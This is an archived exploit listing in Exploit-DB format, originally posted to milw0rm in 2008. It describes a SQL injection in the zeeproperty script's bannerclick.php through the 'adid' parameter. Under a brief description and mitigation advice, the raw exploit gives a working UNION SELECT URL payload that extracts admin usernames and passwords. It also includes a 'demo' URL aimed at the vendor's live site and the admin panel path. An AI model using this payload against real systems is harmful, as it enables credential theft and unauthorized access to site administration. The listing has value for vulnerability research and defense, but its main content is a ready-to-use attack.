zeeproperty (adid) Remote SQL Injection Vulnerability

vendor:

N/A

by:

Hussin X

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

zeeproperty (adid) Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. The malicious request contains a specially crafted SQL query that can be used to extract sensitive information from the database. The malicious request can be sent to the vulnerable application using the 'adid' parameter in the 'bannerclick.php' script.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

|___________________________________________________|
| zeeproperty (adid) Remote SQL Injection Vulnerability
|___________________________________________________
|----------------------  Hussin X  -------------------------|
|
|    Author: Hussin X
|
|    Home :  WwW.IQ-ty.CoM   |  WwW.TrYaG.CC
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|___________________________________________________
|                                                                                                     |
| script    :  http://www.zeeproperty.com
|
| DorK   :  :)
|___________________________________________________|

Exploit:
________

www.[target].com/Script/bannerclick.php?adid=-1+union+select+0,0,concat(name,0x3e,pwd),0,0,0,0,0,0,0+from+admin--


Demo
________

www.zeeproperty.com/bannerclick.php?adid=-1+union+select+0,0,concat(name,0x3e,pwd),0,0,0,0,0,0,0+from+admin--


Admin Panel :
________

www.[target].com/Script/admin

____________________________( Greetz )_________________________________
|
|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
|_____________________________________________________________________

                                               Im IRAQi    |     Im TrYaGi

# milw0rm.com [2008-10-18]